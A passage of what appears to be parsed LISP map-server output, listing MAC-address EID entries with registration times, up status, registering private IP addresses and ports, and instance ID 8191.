"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"04eb.40ff.9f36/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"04eb.40ff.9f3c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.9f45/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.9f57/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9f5d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.9f99/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9fa5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.a0c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.a0f5/48": {
"last_register": "10:15:24",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a017/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.a01d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.a020/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.a023/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.a026/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"04eb.40ff.a02c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.a035/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.a038/48": {
"last_register": "08:59:28",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.a03e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.a044/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a053/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.a059/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a05c/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a08f/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.a092/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.a09b/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.a0b3/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a0b9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.a1c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.a131/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.a158/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.a164/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.a167/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a16a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.a170/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.a176/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.a188/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a191/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.a194/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"04eb.40ff.a1b5/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a2d2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.a2fc/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a203/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a215/48": {
"last_register": "03:09:12",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.a260/48": {
"last_register": "00:30:22",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a3d4/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a3e3/48": {
"last_register": "20:13:35",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.a3ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.a3fb/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a3fe/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.a311/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.a314/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"04eb.40ff.a437/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.a443/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.a449/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.a44c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.a45e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.a752/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a755/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.a782/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a7ac/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a7b2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.a7b5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.a8cf/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a8d5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.a8f3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.a85d/48": {
"last_register": "15:39:16",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a8b1/48": {
"last_register": "00:21:49",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a8b4/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.a9bc/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.a98c/48": {
"last_register": "4d04h",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.a98f/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.a9b6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.aacd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.aad0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.aae2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.aaf1/48": {
"last_register": "01:11:40",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.aa28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.abea/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.ab1e/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.ab21/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"04eb.40ff.ab2d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.ad0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.ad4c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.ad5e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8191,
},
"04eb.40ff.ad73/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.ada9/48": {
"last_register": "00:44:41",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.adb5/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.aebd/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.aee7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.ae99/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.ae9c/48": {
"last_register": "00:56:08",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.b1db/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.b1de/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.b1e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.b133/48": {
"last_register": "1d06h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.b136/48": {
"last_register": "1d01h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.b13c/48": {
"last_register": "10:52:01",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.b142/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.b145/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.b14e/48": {
"last_register": "13:06:00",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.b17b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.b181/48": {
"last_register": "1d10h",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.b18d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.b1ab/48": {
"last_register": "15:56:15",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.b4fc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.b400/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.b7c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.b72a/48": {
"last_register": "11:51:18",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.b730/48": {
"last_register": "00:34:06",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.b742/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.b745/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.b748/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.b74e/48": {
"last_register": "1d02h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.b7ab/48": {
"last_register": "05:31:58",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.b7b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.b8d7/48": {
"last_register": "00:01:56",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.b8e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.b8f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.b8f8/48": {
"last_register": "05:16:54",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.b82f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.b844/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.b85f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.b862/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.b871/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.b889/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.b892/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.b9ca/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.b9d6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.b901/48": {
"last_register": "10:14:47",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.b931/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.b93d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.b943/48": {
"last_register": "22:40:18",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.b970/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.b97c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"0817.35ff.b5b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.8:43876",
"inst_id": 8191,
},
"0896.adff.3dcd/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0896.adff.764d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0896.adff.a484/48": {
"last_register": "1d03h",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"0896.adff.dae8/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0896.adff.899b/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"0896.adff.f148/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0896.adff.ef45/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"08cc.68ff.eecc/48": {
"last_register": "00:19:15",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"08cc.68ff.ef69/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"08cc.68ff.f198/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"08cc.68ff.f272/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"08cc.68ff.f344/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"08cc.68ff.99ad/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"08cc.68ff.9c70/48": {
"last_register": "00:49:28",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"08cc.68ff.e750/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"08cc.68ff.1894/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"08cc.68ff.194d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"08cc.68ff.19cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"08cc.68ff.1b3e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"08cc.68ff.1b47/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"08cc.68ff.1cd2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"08cc.68ff.1cd4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"08cc.68ff.1d3c/48": {
"last_register": "1w6d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"08cc.68ff.c3ec/48": {
"last_register": "02:18:09",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"08ec.f5ff.f753/48": {
"last_register": "1d05h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"08ec.f5ff.911a/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"08ec.f5ff.c633/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"08ec.f5ff.c7ef/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"0c11.67ff.15cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"0c27.24ff.4eaa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0c27.24ff.4eb0/48": {
"last_register": "1w4d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0c75.bdff.46a2/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"10b3.d6ff.48be/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"10bd.18ff.e4aa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"10bd.18ff.9fb0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"1833.9dff.15c4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"189c.5dff.e2c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"189c.5dff.1313/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.23:20011",
"inst_id": 8191,
},
"189c.5dff.1f4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"189c.5dff.20db/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"1c17.d3ff.93f1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"1c1d.86ff.ce51/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"1c1d.86ff.d0e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"1c1d.86ff.d186/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"1c1d.86ff.6ced/48": {
"last_register": "00:35:52",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"1c1d.86ff.6d04/48": {
"last_register": "1d01h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c1d.86ff.0069/48": {
"last_register": "1w5d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"1c1d.86ff.042b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c1d.86ff.0706/48": {
"last_register": "03:04:23",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c1d.86ff.07b3/48": {
"last_register": "02:20:19",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c1d.86ff.08d1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c1d.86ff.26f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c1d.86ff.272c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c1d.86ff.2790/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c1d.86ff.281b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"1c1d.86ff.29cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"1c1d.86ff.2912/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c1d.86ff.292f/48": {
"last_register": "03:49:28",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"1c1d.86ff.2939/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"1c1d.86ff.4301/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"1c1d.86ff.4392/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c1d.86ff.44ce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c1d.86ff.44e7/48": {
"last_register": "00:41:54",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c1d.86ff.4410/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"1c1d.86ff.467f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"1c1d.86ff.479e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"1c6a.7aff.1fb4/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"1c6a.7aff.392e/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"1c6a.7aff.3b4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"1c6a.7aff.3d68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.419a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"1c6a.7aff.4cc2/48": {
"last_register": "1d05h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"1c6a.7aff.55e2/48": {
